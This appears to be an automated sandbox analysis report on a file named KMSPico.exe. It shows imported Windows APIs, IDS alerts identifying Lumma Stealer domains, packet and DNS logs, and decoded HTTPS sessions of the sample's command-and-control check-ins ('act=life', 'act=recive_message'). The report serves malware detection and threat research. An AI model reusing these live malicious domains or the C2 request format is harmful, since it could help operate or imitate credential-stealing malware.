KERNEL32.dll | HeapAlloc, SystemTimeToFileTime, GetUserDefaultLCID, WideCharToMultiByte, GetConsoleAliasExesLengthW, GetTimeZoneInformation, ReleaseSemaphore, ReplaceFileA, GetStdHandle, GetCurrentDirectoryW, SetLastError, CreateNamedPipeA, CreateTimerQueueTimer, BuildCommDCBW, LoadLibraryA, SystemTimeToTzSpecificLocalTime, LocalAlloc, GetFileType, AddAtomW, GetModuleFileNameA, lstrcatW, FreeEnvironmentStringsW, VirtualProtect, FatalAppExitA, EndUpdateResourceA, GetVolumeInformationW, CreateFileW, WriteConsoleW, ReadFile, GetProcessHeap, GetLocaleInfoA, MoveFileExA, InterlockedExchangeAdd, WriteConsoleOutputCharacterW, SetEndOfFile, SetStdHandle, GetLastError, HeapFree, EncodePointer, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, HeapCreate, Sleep, HeapSize, GetProcAddress, GetModuleHandleW, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, RtlUnwind, WriteFile, GetModuleFileNameW, GetEnvironmentStringsW, SetHandleCount, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, HeapReAlloc, LoadLibraryW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, MultiByteToWideChar, GetStringTypeW, SetFilePointer
USER32.dll | SetActiveWindow, SetKeyboardState, CreateIcon, GetClassLongA
GDI32.dll | GetCharWidthW
ADVAPI32.dll | GetAce
ole32.dll | CoTaskMemFree
Language of compilation system | Country where language is spoken | Map
English | United States |


Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/29/24-01:47:53.832376 | TCP | 2051001 | ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | 49705 | 443 | 192.168.2.5 | 104.21.80.118
02/29/24-01:48:00.206830 | TCP | 2051001 | ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | 49710 | 443 | 192.168.2.5 | 104.21.80.118
02/29/24-01:47:59.419425 | TCP | 2051001 | ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | 49709 | 443 | 192.168.2.5 | 104.21.80.118
02/29/24-01:47:53.145475 | UDP | 2050998 | ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (technologyenterdo .shop) | 64821 | 53 | 192.168.2.5 | 1.1.1.1
02/29/24-01:48:01.392463 | TCP | 2051001 | ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | 49711 | 443 | 192.168.2.5 | 104.21.80.118
02/29/24-01:47:53.047409 | UDP | 2050955 | ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (problemregardybuiwo .fun) | 58632 | 53 | 192.168.2.5 | 1.1.1.1
02/29/24-01:47:53.254875 | TCP | 2051001 | ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | 49704 | 443 | 192.168.2.5 | 104.21.80.118
02/29/24-01:47:55.834473 | TCP | 2051001 | ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | 49707 | 443 | 192.168.2.5 | 104.21.80.118
02/29/24-01:47:56.787043 | TCP | 2051001 | ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | 49708 | 443 | 192.168.2.5 | 104.21.80.118
02/29/24-01:47:54.800926 | TCP | 2051001 | ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | 49706 | 443 | 192.168.2.5 | 104.21.80.118
                                    • Total Packets: 102
                                    • 443 (HTTPS)
                                    • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 29, 2024 01:47:53.252562046 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.252661943 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.252751112 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.254874945 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.254911900 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.448390961 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.448472023 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.451306105 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.451328993 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.451603889 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.493557930 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.531466007 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.531502962 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.531619072 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.825448990 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.825717926 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.825798035 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.828275919 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.828310013 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.828330994 CET | 49704 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.828337908 CET | 443 | 49704 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.831789970 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.831821918 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:53.831907988 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.832376003 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:53.832387924 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.019648075 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.019717932 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.020916939 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.020925999 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.021169901 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.022381067 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.022404909 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.022444963 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.575508118 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.575805902 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.575875044 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.575891972 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.576625109 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.576673985 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.576680899 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577045918 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577090025 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.577095985 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577255011 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577300072 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.577306032 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577545881 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577594042 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.577600002 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577753067 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577795982 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.577801943 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577903032 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.577945948 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.577951908 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.578035116 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.578079939 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.587133884 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.587146997 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.587174892 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.587178946 CET | 443 | 49705 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.800396919 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.800440073 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.800529003 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.800925970 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.800966024 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.987303019 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.987478018 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.988651037 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.988660097 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.988893986 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:54.990272045 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.990436077 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:54.990469933 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:55.463917971 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:55.464035988 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:55.464255095 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:55.464255095 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:55.774780989 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:55.774811983 CET | 443 | 49706 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:55.833693027 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:55.833745956 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:55.833820105 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:55.834472895 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:55.834486008 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.020973921 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.021049976 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.022722960 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.022731066 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.022922993 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.024590015 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.024884939 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.024924040 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.024986029 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.024992943 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.506326914 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.506648064 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.506788015 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.507476091 CET | 49707 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.507522106 CET | 443 | 49707 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.786261082 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.786367893 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.786492109 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.787043095 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.787075996 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.977895975 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.978259087 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.980424881 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.980456114 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.980731010 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.982371092 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.982575893 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.982614040 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:56.982707024 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:56.982723951 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:57.513959885 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:57.514065027 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:57.514156103 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:57.514420033 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:57.514467001 CET | 443 | 49708 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:59.418437958 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:59.418467045 CET | 443 | 49709 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:59.418586969 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:59.419425011 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:59.419436932 CET | 443 | 49709 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:59.617680073 CET | 443 | 49709 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:59.617785931 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:59.619257927 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:59.619265079 CET | 443 | 49709 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:59.619501114 CET | 443 | 49709 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:47:59.620587111 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:59.620742083 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:47:59.620769978 CET | 443 | 49709 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.099730015 CET | 443 | 49709 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.099982023 CET | 443 | 49709 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.100002050 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.100049019 CET | 49709 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.206186056 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.206252098 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.206356049 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.206830025 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.206860065 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.399436951 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.399538040 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.402555943 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.402586937 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.402863026 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.404074907 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.404216051 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.404227018 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.873116016 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.873361111 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:00.873475075 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:00.873476028 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.181049109 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.181078911 CET | 443 | 49710 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.391927958 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.392013073 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.392083883 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.392462969 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.392482042 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.588665009 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.588838100 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.590015888 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.590034962 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.590264082 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.591500044 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.592488050 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.592516899 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.592613935 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.592643976 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.592753887 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.592782974 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.592904091 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.592938900 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.593089104 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.593122959 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.593301058 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.593327999 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.593338013 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.593353033 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.593491077 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.593518019 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.593544960 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.593678951 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.593713045 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.633915901 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.634490013 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.634524107 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.634553909 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.634572029 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.634605885 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.634620905 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:01.634710073 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:01.634727955 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:03.200050116 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:03.200330973 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Feb 29, 2024 01:48:03.200400114 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:03.200459003 CET | 49711 | 443 | 192.168.2.5 | 104.21.80.118
Feb 29, 2024 01:48:03.200483084 CET | 443 | 49711 | 104.21.80.118 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 29, 2024 01:47:53.047409058 CET | 58632 | 53 | 192.168.2.5 | 1.1.1.1
Feb 29, 2024 01:47:53.140845060 CET | 53 | 58632 | 1.1.1.1 | 192.168.2.5
Feb 29, 2024 01:47:53.145474911 CET | 64821 | 53 | 192.168.2.5 | 1.1.1.1
Feb 29, 2024 01:47:53.243330956 CET | 53 | 64821 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 29, 2024 01:47:53.047409058 CET | 192.168.2.5 | 1.1.1.1 | 0xf0d8 | Standard query (0) | problemregardybuiwo.fun | A (IP address) | IN (0x0001) | false
Feb 29, 2024 01:47:53.145474911 CET | 192.168.2.5 | 1.1.1.1 | 0xdaa2 | Standard query (0) | technologyenterdo.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 29, 2024 01:47:53.140845060 CET | 1.1.1.1 | 192.168.2.5 | 0xf0d8 | Name error (3) | problemregardybuiwo.fun | none | none | A (IP address) | IN (0x0001) | false
Feb 29, 2024 01:47:53.243330956 CET | 1.1.1.1 | 192.168.2.5 | 0xdaa2 | No error (0) | technologyenterdo.shop | | 104.21.80.118 | A (IP address) | IN (0x0001) | false
Feb 29, 2024 01:47:53.243330956 CET | 1.1.1.1 | 192.168.2.5 | 0xdaa2 | No error (0) | technologyenterdo.shop | | 172.67.180.132 | A (IP address) | IN (0x0001) | false
                                    • technologyenterdo.shop
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549704104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:47:53 UTC269OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:53 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                    Data Ascii: act=life
                                    2024-02-29 00:47:53 UTC812INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=a0gi9idbpk8fbq58efqfqv98ei; expires=Sun, 23-Jun-2024 18:34:32 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fTox79jmODUc%2F%2BPub11xfeP6fzMhMlqeUtMW9K77kTtaK%2BQw0mRHLFhiq7JqBigp3lD%2FXgZf4OZfz8knfUu9QlksaRy0LuNXVkCD%2FOws%2FHYzsNx5thuH%2BYW7UvpKEHAWv3tygqWD83LT"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce6081af842d3-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:53 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
                                    Data Ascii: 2ok
                                    2024-02-29 00:47:53 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                    1           192.168.2.5  49705        104.21.80.118   443               3648  C:\Users\user\Desktop\KMSPico.exe
                                    Timestamp                Bytes transferred  Direction  Data
                                    2024-02-29 00:47:54 UTC  270                OUT        POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 52
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:54 UTC  52                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 54 7a 70 32 63 71 2d 2d 4b 4d 53 26 6a 3d 64 65 66 61 75 6c 74
                                    Data Ascii: act=recive_message&ver=4.0&lid=Tzp2cq--KMS&j=default
                                    2024-02-29 00:47:54 UTC  806                IN         HTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=g28jil4tlkq5o7dsnhlk537od9; expires=Sun, 23-Jun-2024 18:34:33 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
